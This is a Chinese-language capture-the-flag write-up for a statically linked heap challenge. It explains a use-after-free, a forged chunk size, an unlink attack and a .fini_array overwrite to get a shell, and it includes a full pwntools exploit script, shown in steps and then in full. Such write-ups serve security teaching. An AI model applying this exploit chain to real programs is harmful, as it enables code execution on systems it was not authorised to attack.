检查
这是一道静态编译的题,没有libc库,所以不能用常规的方法来打
分析:
直接看漏洞点
这里free之后没有对指针置空,所以存在double free和UAF漏洞。
思路
.fini_array会在程序结束时调用,一般有2个指针,会依次调用,调用完后才会真正退出。
先利用UAF漏洞,把chunk申请到ptr_size处,修改size的大小,构造堆溢出,利用堆溢出,打unlink,把chunk申请到ptr处,最后篡改**.fini_array**的值,拿到shell
利用
先把前面的代码写好
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
#io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",29732)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
def add(size):
ru(b"your choice: ")
sl(b"1")
ru(b"size: ")
sl(str(size))
def free(idx):
ru(b"your choice: ")
sl(b"2")
ru(b"index: ")
sl(str(idx))
def edit(idx,data):
ru(b"your choice: ")
sl(b"3")
ru(b"index: ")
sl(str(idx))
ru(b"content: ")
s(data)
先定义好要用到的地址
fini_array = 0x6CAE88
fake_chunk = 0x6cde70
fake_fd = fake_chunk-0x18
fake_bk = fake_chunk-0x10
ptr_size = 0x6CDEC0
先用UAF把chunk申请到size处。如下图,可以看出来chunk已经申请到size处了,之后伪造size,造成堆溢出
add(0x7f)
add(0x60)
add(0x7f)
free(1)
edit(1,p64(ptr_size))
add(0x60) #3
add(0x60) #4
之后篡改size大小
add(0x80) #5
add(0x80) #6
add(0x80) #7
add(0x10) #8
edit(4,b"\xff\x00\x00\x00"*4)
结果如下图,size都改成了0xff
之后再利用堆溢出,打unlink,篡改.fini_array
payload = p64(0)+p64(0x81)+p64(fake_fd)+p64(fake_bk)+b"a"*(0x80-4*8)
payload += p64(0x80)+p64(0x90)
edit(6,payload)
free(7)
edit(6,p64(0)*3+p64(fini_array))
edit(6,p64(0x4009AE)*2)
ru(b"your choice: ")
sl(b"4")
最终exp为
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
#io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",29732)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
def add(size):
ru(b"your choice: ")
sl(b"1")
ru(b"size: ")
sl(str(size))
def free(idx):
ru(b"your choice: ")
sl(b"2")
ru(b"index: ")
sl(str(idx))
def edit(idx,data):
ru(b"your choice: ")
sl(b"3")
ru(b"index: ")
sl(str(idx))
ru(b"content: ")
s(data)
fini_array = 0x6CAE88
fake_chunk = 0x6cde70
fake_fd = fake_chunk-0x18
fake_bk = fake_chunk-0x10
ptr_size = 0x6CDEC0
add(0x7f)
add(0x60)
add(0x7f)
free(1)
edit(1,p64(ptr_size))
add(0x60) #3
add(0x60) #4
add(0x80) #5
add(0x80) #6
add(0x80) #7
add(0x10) #8
edit(4,b"\xff\x00\x00\x00"*4)
payload = p64(0)+p64(0x81)+p64(fake_fd)+p64(fake_bk)+b"a"*(0x80-4*8)
payload += p64(0x80)+p64(0x90)
edit(6,payload)
free(7)
edit(6,p64(0)*3+p64(fini_array))
edit(6,p64(0x4009AE)*2)
ru(b"your choice: ")
sl(b"4")
itr()